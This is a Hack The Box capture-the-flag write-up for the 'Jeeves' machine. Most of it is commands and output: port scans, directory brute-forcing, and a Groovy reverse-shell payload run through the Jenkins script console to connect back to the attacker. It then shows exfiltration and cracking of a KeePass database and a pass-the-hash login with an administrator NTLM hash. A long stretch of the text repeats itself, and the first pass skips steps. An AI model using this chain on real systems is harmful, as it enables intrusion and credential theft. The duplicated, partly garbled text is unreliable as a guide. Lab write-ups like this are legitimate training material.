Hack The Box Jeeves Writeup
STEP 1.
danger@V2Geeks:~/Dropbox/00/hTB/jeeves$ nmap -sC -sV -oA initial 10.10.10.63
# Nmap 7.70 scan initiated Thu May 24 18:01:53 2018 as: nmap -sC -sV -oA initial 10.10.10.63Nmap scan report for 10.10.10.63
Host is up (0.18s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 5h00m00s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-05-24 23:02:50
|_ start_date: 2018-05-24 22:19:54
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 24 18:03:28 2018 -- 1 IP address (1 host up) scanned in 95.24 seconds
STEP 2:
http://10.10.10.63 PORT: 80
STEP 3.
http://10.10.10.63:50000 PORT: 50000
STEP 4: gobuster on port 80
danger@V2Geeks:~$ gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 80.txt
Explanation: finding sub directory under root using dirbuster dictionery and thread value 15
STEP 5: gobuster on port 50000
danger@V2Geeks:~$ gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 50000.txt
STEPS 6: Important directories listed
/askjeeves (Status: 302)
Lets try http://10.10.10.53/askjeeves/
will show you dashboard
Steps 7:
Goto: Dashboard->Manage Jenkins-->Script console
Step 8: Printing Helloworld message in groovy
cmd = " cmd.exe /c echo ''Hello World'' "
println cmd.execute().text
Step 9: Getting initial Shell
start listening on 8044 port using netcat
danger@V2Geeks:~/Dropbox/00/hTB/jeeves/www$ nc -nlvp 8044
listening on [any] 8044 ...
Script Console
String host="10.10.14.191";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Run
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.191] from (UNKNOWN) [10.10.10.63] 49700
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>
C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
C:\Users\Administrator\.jenkins>cd c:/users/kohsuke/Desktop
Directory of c:\Users\kohsuke\Desktop dir
11/03/2017 11:19 PM <DIR> .
11/03/2017 11:19 PM <DIR> ..
11/03/2017 11:22 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 7,269,990,400 bytes free
c:\Users\kohsuke\Desktop>type users.txt
type users.txt
The system cannot find the file specified.
c:\Users\kohsuke\Desktop>type user.txt
type user.txt
-----96fb------47950d59c4----
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,269,990,400 bytes free
To download CEH.kdbx lets first upload ncat.exe to windows machine
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
06/09/2018 09:14 PM <DIR> .
06/09/2018 09:14 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
06/09/2018 09:15 PM 1,667,584 nc.exe
2 File(s) 1,670,430 bytes
2 Dir(s) 7,267,651,584 bytes free
To Download CEH.kdbx to linux machine using netcat
danger@kali:~$ apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
Password manager
keepass2-doc/kali-rolling 2.38+dfsg-1 all
Password manager - Documentation
keepassx/kali-rolling 2.0.3-1 amd64
Cross Platform Password Manager
keepassxc/kali-rolling 2.3.1+dfsg.1-1 amd64
Cross Platform Password Manager
kpcli/kali-rolling 3.1-3 all
command line interface to KeePassX password manager databases
libfile-keepass-perl/kali-rolling 2.03-1 all
interface to KeePass V1 and V2 database files
Write it to blank file CEHjohnable and lets crack hash using johnthe ripper and rockyou dictionery
danger@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt CEHjohnableUsing default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
Wait for 5 minute
moonshine1 (?)
1g 0:00:00:55 DONE (2018-06-09 17:55) 0.01789g/s 983.9p/s 983.9c/s 983.9C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Enter password and click ok
NTLM Hash found under Backup stuff
danger@kali:~$ pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
move to Desktop and list all content in
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,267,586,048 bytes free
c:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere. Look deeper.
c:\Users\Administrator\Desktop>dir /r /a:
dir /r /a:
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
11/03/2017 10:03 PM 282 desktop.ini
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
3 File(s) 1,115 bytes
2 Dir(s) 7,267,586,048 bytes free
Note: here hm.txt” had an ADS called “root.txt”
c:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
----------------4b615a606----------c92----
Hash Found !!!!!!!!!
11/03/2017 11:19 PM <DIR> .
11/03/2017 11:19 PM <DIR> ..
11/03/2017 11:22 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 7,269,990,400 bytes free
c:\Users\kohsuke\Desktop>type users.txt
type users.txt
The system cannot find the file specified.
c:\Users\kohsuke\Desktop>type user.txt
type user.txt
-----96fb------47950d59c4----
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,269,990,400 bytes free
To download CEH.kdbx lets first upload ncat.exe to windows machine
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
06/09/2018 09:14 PM <DIR> .
06/09/2018 09:14 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
06/09/2018 09:15 PM 1,667,584 nc.exe
2 File(s) 1,670,430 bytes
2 Dir(s) 7,267,651,584 bytes free
To Download CEH.kdbx to linux machine using netcat
danger@kali:~$ ls -la CEH.kdbx
-rw-r--r-- 1 danger danger 2846 Jun 9 16:40 CEH.kdbx
danger@kali:~$ apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
Password manager
keepass2-doc/kali-rolling 2.38+dfsg-1 all
Password manager - Documentation
keepassx/kali-rolling 2.0.3-1 amd64
Cross Platform Password Manager
keepassxc/kali-rolling 2.3.1+dfsg.1-1 amd64
Cross Platform Password Manager
kpcli/kali-rolling 3.1-3 all
command line interface to KeePassX password manager databases
libfile-keepass-perl/kali-rolling 2.03-1 all
interface to KeePass V1 and V2 database files
danger@kali:~$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
It's we have to remove CEH:
Finla hash is
$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Write it to blank file CEHjohnable and lets crack hash using johnthe ripper and rockyou dictionery
danger@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt CEHjohnableUsing default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
Wait for 5 minute
moonshine1 (?)
1g 0:00:00:55 DONE (2018-06-09 17:55) 0.01789g/s 983.9p/s 983.9c/s 983.9C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
moonshine1 is the password for CEH.kdbx
danger@kali:~$ apt-get install keepassx
danger@kali:~$ keepassx CEHjohnable
NTLM Hash found under Backup stuff
danger@kali:~$ pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
move to Desktop and list all content in
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,267,586,048 bytes free
c:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere. Look deeper.
c:\Users\Administrator\Desktop>dir /r /a:
dir /r /a:
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
11/03/2017 10:03 PM 282 desktop.ini
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
3 File(s) 1,115 bytes
2 Dir(s) 7,267,586,048 bytes free
c:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
----------------4b615a606----------c92----
Hash Found !!!!!!!!!
